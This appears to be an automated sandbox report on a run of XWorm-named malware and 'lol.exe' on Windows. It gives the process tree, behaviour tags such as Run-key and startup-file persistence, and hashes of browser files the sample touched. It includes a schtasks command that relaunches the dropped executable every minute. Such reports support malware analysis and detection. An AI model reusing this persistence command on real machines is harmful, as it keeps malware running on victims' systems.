                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ff9e3b6cc40,0x7ff9e3b6cc4c,0x7ff9e3b6cc58
                                                                            2⤵
                                                                              PID:3632
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=1848 /prefetch:2
                                                                              2⤵
                                                                                PID:4644
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=2136 /prefetch:3
                                                                                2⤵
                                                                                  PID:2244
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=2224 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5028
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                    2⤵
                                                                                      PID:2536
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=3252 /prefetch:1
                                                                                      2⤵
                                                                                        PID:4960
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=4484 /prefetch:1
                                                                                        2⤵
                                                                                          PID:3848
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=4776 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1068
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=4924 /prefetch:8
                                                                                            2⤵
                                                                                              PID:968
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5032,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                              2⤵
                                                                                                PID:3188
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3484,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=5016 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1636
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3388,i,2573966777827005395,10062099850276096719,262144 --variations-seed-version=20250131-130103.379000 --mojo-platform-channel-handle=3380 /prefetch:8
                                                                                                  2⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:4820
                                                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                1⤵
                                                                                                  PID:3140
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                  1⤵
                                                                                                    PID:1036
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                    1⤵
                                                                                                      PID:4516
                                                                                                    • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2600
                                                                                                    • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4064
                                                                                                    • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2920
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://taskmgfr/
                                                                                                      1⤵
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                      PID:2952
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9cb253cb8,0x7ff9cb253cc8,0x7ff9cb253cd8
                                                                                                        2⤵
                                                                                                          PID:3164
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4582452192931158082,1579416846971337557,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
                                                                                                          2⤵
                                                                                                            PID:5104
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,4582452192931158082,1579416846971337557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
                                                                                                            2⤵
                                                                                                              PID:1532
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,4582452192931158082,1579416846971337557,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:4276
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4582452192931158082,1579416846971337557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:3320
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4582452192931158082,1579416846971337557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:4524
                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:1544
                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3288
                                                                                                                    • C:\Windows\System32\Taskmgr.exe
                                                                                                                      "C:\Windows\System32\Taskmgr.exe"
                                                                                                                      1⤵
                                                                                                                        PID:3372
                                                                                                                      • C:\Windows\System32\Taskmgr.exe
                                                                                                                        "C:\Windows\System32\Taskmgr.exe"
                                                                                                                        1⤵
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        PID:1588
                                                                                                                      • C:\Users\Admin\Desktop\lol.exe
                                                                                                                        "C:\Users\Admin\Desktop\lol.exe"
                                                                                                                        1⤵
                                                                                                                        • Drops startup file
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Adds Run key to start application
                                                                                                                        PID:396
                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                          "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "lol" /tr "C:\Users\Admin\AppData\Roaming\lol.exe"
                                                                                                                          2⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:2024
                                                                                                                      • C:\Users\Admin\AppData\Roaming\lol.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\lol.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3988
                                                                                                                      • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3112

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                        MD5

                                                                                                                        c27c1374edd5b819ac9f67c91d286373

                                                                                                                        SHA1

                                                                                                                        6768048f19f4dd2a3ab401e9f0b57570601f24a8

                                                                                                                        SHA256

                                                                                                                        a2d78e1e44733d24842f4e3a4fb86abd35219df6f6e90393c59abe99e1bb9ec0

                                                                                                                        SHA512

                                                                                                                        82bda0747e2e965f9e7a24ae494342af3f96043609eee38db74d18a3da0ddb0c2dabbb23c3f9223e5d0e89256b0b7a4ae0a0537966dd57a181a4505ad8a462c3

                                                                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                        Filesize

                                                                                                                        4B

                                                                                                                        MD5

                                                                                                                        f49655f856acb8884cc0ace29216f511

                                                                                                                        SHA1

                                                                                                                        cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                        SHA256

                                                                                                                        7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                        SHA512

                                                                                                                        599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                      • C:\Users\Admin\AppData\Local\D3DSCache\ecbf0d5a3a180bb\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                        Filesize

                                                                                                                        960B

                                                                                                                        MD5

                                                                                                                        4f55be8451c1090c2a54a50d79243cfb

                                                                                                                        SHA1

                                                                                                                        f1a94bc446b6ae32300ada858fb251667a17b71d

                                                                                                                        SHA256

                                                                                                                        1b8257869915ac04445cb4bfdc0e0fc03db80efb96da98c49e7cbc4097bc28a2

                                                                                                                        SHA512

                                                                                                                        b87403fc4ab05cd4dd092d0707cd0dd22f927c65dcf73bce6f6bf2731f0572e089697908eeb377617c9f2531fdb3a495087feafb31871ea9a6f472a45d9d20f6

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\7fc33bfb-8174-476c-8d77-56ca790206db.tmp

                                                                                                                        Filesize

                                                                                                                        236KB

                                                                                                                        MD5

                                                                                                                        c1b1c665b093f41d3b897d9c20d3bcb5

                                                                                                                        SHA1

                                                                                                                        856094fdd2d19312af7485a9746e84c987da68ea

                                                                                                                        SHA256

                                                                                                                        8d3ca4821c456161c667c61aab8fe927b8c9ad318b107e1599c9ce6f9590bc3e

                                                                                                                        SHA512

                                                                                                                        bfccb98839e2e2f9010919de4aef654b8c836e100238ff5c032bb83f2448fc7f2b08293a127fc4c65f1a6b2bd4d96bb591ddf4bdc33504b0b310a045c7a2c518

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        40B

                                                                                                                        MD5

                                                                                                                        405dd156f0b697f2d0702afedb827b80

                                                                                                                        SHA1

                                                                                                                        41e7bd95b48a39edd67e751abf94c92b6617271a

                                                                                                                        SHA256

                                                                                                                        a764eb30b54d11ded5b23807bca8dee0a2a36b921de032d8923b11b5eb835e77

                                                                                                                        SHA512

                                                                                                                        981f35b0c8c9261a4ad7c6c4cf01c5e062f510c7e58affeea3d541510a8bff28f124a0a0142ced89502b4540b50161d201e61a5a0ba08b7504cb6560f5627d4b

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\5c59bbdc-3aa5-497c-a0d6-ebfa7b1e3a0b.tmp

                                                                                                                        Filesize

                                                                                                                        1B

                                                                                                                        MD5

                                                                                                                        5058f1af8388633f609cadb75a75dc9d

                                                                                                                        SHA1

                                                                                                                        3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                        SHA256

                                                                                                                        cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                        SHA512

                                                                                                                        0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                        Filesize

                                                                                                                        649B

                                                                                                                        MD5

                                                                                                                        703d2a6f2d0b63107766a428068de3f8

                                                                                                                        SHA1

                                                                                                                        b7b2d9daa49a6992b8d0275b16bd39ceee328fdf

                                                                                                                        SHA256

                                                                                                                        f481c8facf355f9c2cbb2af7337448048574fe710ddc552cad14b9bc6f038c6f

                                                                                                                        SHA512

                                                                                                                        ecfe78e9b7c25ae89254364f323db76e41554779017a2cb0783c59af935881a269959c9e1ee96c393f971972deda5457deed4d0b48d9f413d8d6bbb63caf6cdc

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        0733efe7f85e515e936ac05e7f1450f6

                                                                                                                        SHA1

                                                                                                                        db45ce64c6047a426e8f050f5e55868ba31afb33

                                                                                                                        SHA256

                                                                                                                        502bae12a90d9655daf37af5dc3b53a93cc3e63c2a6f25374c7f7acc7181e1c1

                                                                                                                        SHA512

                                                                                                                        6da604eef1b760d653a506259838b25b769a147ccab10a6116ced660ae5850bfe333e0a728cccd96b5b6cb3a319216ac1d450b20364ffdffb40618a03c4ee7ec

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                        Filesize

                                                                                                                        3KB

                                                                                                                        MD5

                                                                                                                        61eb528e1d832848193f31d6c579112b

                                                                                                                        SHA1

                                                                                                                        05fdd0f84fa9833da8bef197bb6e1325686aaa73

                                                                                                                        SHA256

                                                                                                                        185ccd60c9e95ebe3b3eb403e23c3bdd33da290b0808c8101af4d6f186bfbb0b

                                                                                                                        SHA512

                                                                                                                        d51c2eada6eca2e0c4c5b566779f18ad62dfd2f267e8127c88b125c0557f4e83957364db3663fd59b4fd62603097443ff102e15e8c55dd48b75e49a966753e25

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        457c396ce24f517e2fd7bff6d4b3a2de

                                                                                                                        SHA1

                                                                                                                        db8a25c688a58985922bfdaa16830ac33536f89d

                                                                                                                        SHA256

                                                                                                                        e34f1ef186dc55ba094f65a664f7f5b98854b0cdc40b67ffd710d9d48cacab30

                                                                                                                        SHA512

                                                                                                                        2216f18bea69f1bf82b9bd0c5800e9bb0d489421e9ac4900560252d4f08ef7be72b045f1027c2573f73e879948054c0ea40a24ec4ceaa82e93a55f89a5ee752b

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                        Filesize

                                                                                                                        264KB

                                                                                                                        MD5

                                                                                                                        ff34a41321d2fd52f7f05cc17bcd5f93

                                                                                                                        SHA1

                                                                                                                        d2250ef8ecb3e0148d8144e7238a3599afd0c9ec

                                                                                                                        SHA256

                                                                                                                        24635992cecd57d4c256ae7ce6e7b031cc22134c4d2a774079d0f3eb4ecb51e1

                                                                                                                        SHA512

                                                                                                                        081ef3aecc3878ffb5041be28631d5bbdd917d413fda36028ee1fb14ab1daf2ac5cc69c047ae1ff1c55b654398bcfe846e643f972e015283981efb3c84e41d6a

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                                                                        Filesize

                                                                                                                        160KB

                                                                                                                        MD5

                                                                                                                        e9642deb3f0f295bbfa5a5348c4c0a71

                                                                                                                        SHA1

                                                                                                                        03e4ddd17339995d08ea41edd55170042a857c1f

                                                                                                                        SHA256

                                                                                                                        cd81073d3408cff8eb4f7c425e1ea8703a9621c26b4fa98d9feac79fa6a72c45

                                                                                                                        SHA512

                                                                                                                        31fa5b2c0739d2da44c1b6d8c9969c41c00ae3850d85493275df08878e1e6f882ac6628beab661694ffcdb029ff00b662a54f21e49c934471ecd6221267a6d68

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.roblox.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                        Filesize

                                                                                                                        23B

                                                                                                                        MD5

                                                                                                                        3fd11ff447c1ee23538dc4d9724427a3

                                                                                                                        SHA1

                                                                                                                        1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                                                        SHA256

                                                                                                                        720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                                                        SHA512

                                                                                                                        10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\2e90c171-c665-4e81-a667-f781dddefd87.tmp

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        79545c090ba41dc98872e77e3a6e184c

                                                                                                                        SHA1

                                                                                                                        f5691d6b7050198a7dcee98cb3595c018577764b

                                                                                                                        SHA256

                                                                                                                        400276695d801f8de3f71272c1a5ee214dacd926c90dc47f98334f55e4284d5e

                                                                                                                        SHA512

                                                                                                                        79f6178dbdfbdb328c2c2761539e88c856792d6a0f4c26ec1bb69771bd446e0bdd32da664f2a90e8ea29e4c5d342433ed35982a54788837b80a10a44dd8bdf2c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                                                                        Filesize

                                                                                                                        20KB

                                                                                                                        MD5

                                                                                                                        7a0b2f1635c49da2daf6bcde79be992d

                                                                                                                        SHA1

                                                                                                                        9bc53c501d594c9cac1a52074dea277c1fbdeeff

                                                                                                                        SHA256

                                                                                                                        410cc651beb15af99dafdb03797c0150ed1c3be84573c0ba17a63ea73fde514a

                                                                                                                        SHA512

                                                                                                                        021edf791ade74a2de03897390f44049a769ce508fd78894a2a4bda7d29fd4fb8c4ec0403948a57012b215162f1e39005733a491116f1c4a105303d61a6cfde6

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        8d652574bc598dab026d688b38261142

                                                                                                                        SHA1

                                                                                                                        7ba91b52ab04e5149518be6234b108b1c8b82864

                                                                                                                        SHA256

                                                                                                                        ea3e96d9f5cf6897e9c1fcafcb4fe6bb038845ad4acac792ec1371a1132e8d91

                                                                                                                        SHA512

                                                                                                                        56b71c964d6d0e4c0e7e513a75a3a2aeb7dd627a407d87a79e2f840e7dd5251637070186a6efffd2b9e97807c6ad75f6d417aadac44c6b5af5425d8200bd3ad8

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                        Filesize

                                                                                                                        2B

                                                                                                                        MD5

                                                                                                                        d751713988987e9331980363e24189ce

                                                                                                                        SHA1

                                                                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                        SHA256

                                                                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                        SHA512

                                                                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        bd6f972c5ee0f388f19d8ce2c2c27b10

                                                                                                                        SHA1

                                                                                                                        3b0b2c9c669d07017e6ae4f303e57fb7c3a44719

                                                                                                                        SHA256

                                                                                                                        61e8c3ace4f90d92834bc672d691eccd0722ab63a3ddf4cf9e9b4adb8883d62e

                                                                                                                        SHA512

                                                                                                                        c0d37f12b615c3b0b866b99c992bcc49ab855e2e1ff165cccb9f9098a565179855b006ebd24cb396351cbf1dd305fbad0692691afee0984741df3e023f70a4ce

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        8ec08fbd67e07b6d1b3f614870761e33

                                                                                                                        SHA1

                                                                                                                        b0d4e0748981ec2479882ce926a7324d51535ef3

                                                                                                                        SHA256

                                                                                                                        67b67a94fb4f8517c3ba13ed4cf16fb4c3f52dfa92585ac6508e0ab3c39e7d16

                                                                                                                        SHA512

                                                                                                                        24010d4cfdbef57ef8ebe1e7a60e8d256577d96befd38680f84ef90fc5875f580080ee88b0444303ad4110992ec3190345e058c5d6edd76472d5010276c598a1

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        27b12e8f62d8fa9755ea9774f7e4e7d5

                                                                                                                        SHA1

                                                                                                                        516ddccd2549777e39c8eca1b60edc826371cec3

                                                                                                                        SHA256

                                                                                                                        851c7c4907eb42d904a31f449615f760a3a907dcfc8ee9919c4e16287e0ce6e1

                                                                                                                        SHA512

                                                                                                                        e2c55afde4ec1b309e29099af86bf142bc7f3676d65eb4ad3933f4d66ad58d794ff734c7cd6875dd882654072c023ca1212d97b077ad9a1b97cdc013c6a72a4a

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        352B

                                                                                                                        MD5

                                                                                                                        ec7e8c496d6104f32bbbdaa7da681dd9

                                                                                                                        SHA1

                                                                                                                        991b4fc2de7e400ccd90d6ddb7e5a319c4c71ad3

                                                                                                                        SHA256

                                                                                                                        0825249e653a7988eedc3e03630afc1fe6dfef727be50da114b210788369b9a8

                                                                                                                        SHA512

                                                                                                                        b1cd870cc0b9087a31bbc030299d6b202584f83b1539ced365c8efc0e7d0c2fae9cc313108e265f269fc6e537c0d214e96c44c48a34cac04f1db5fc96470aad9

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        3e7b883c56d0151500ef68a3f0a517d9

                                                                                                                        SHA1

                                                                                                                        4caca4b26e1e0377fac633254b0088c2159de5dc

                                                                                                                        SHA256

                                                                                                                        439d0be1eaff83d8ea1a3beffa9cba1f458fa70e5930265e005bc565d9317d4f

                                                                                                                        SHA512

                                                                                                                        ba754e46e2c3329d92d0d89a3a880ea1f61fd3b9a765c47918cac1e98a7d75498e6308b9bf63582134fe8ba0de0a5e8034f249eb751a3079ff95799d675a2879

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        5a32b5749c927ea58c6d495a7ef59f18

                                                                                                                        SHA1

                                                                                                                        bb396283b5df8bdf239fe71a1b84596ef8775720

                                                                                                                        SHA256

                                                                                                                        8ab47b8355bc1be8bff266209d1b9b9f25be6544704dccfd3c112cbcf05cd837

                                                                                                                        SHA512

                                                                                                                        9cd80d1359706a659fbfb828d39946ab4d198b3c95bb96e865573772dbbeda072a81b9ce2c07fcc291f63f7d6b6537b88d956f64377693399f2a827219edf5a9

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        5a99f7dee9a1deed937c4bd817e6d6df

                                                                                                                        SHA1

                                                                                                                        5c9b0601c43b743e32641dfc72665e210b227e49

                                                                                                                        SHA256

                                                                                                                        8f98cc6fed4b0563aca26785dcb5b19bb2cba44581c4aa1890d7173196ebdf89

                                                                                                                        SHA512

                                                                                                                        5e30d5e3947f432342e6d455cfdfde937ce4725faf166484ffe44c0993799c73f322c4d88cdf764ca87b484f732f3f6e344ed51f5a5bb4b78d0c9a7fd9a0c6d7

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

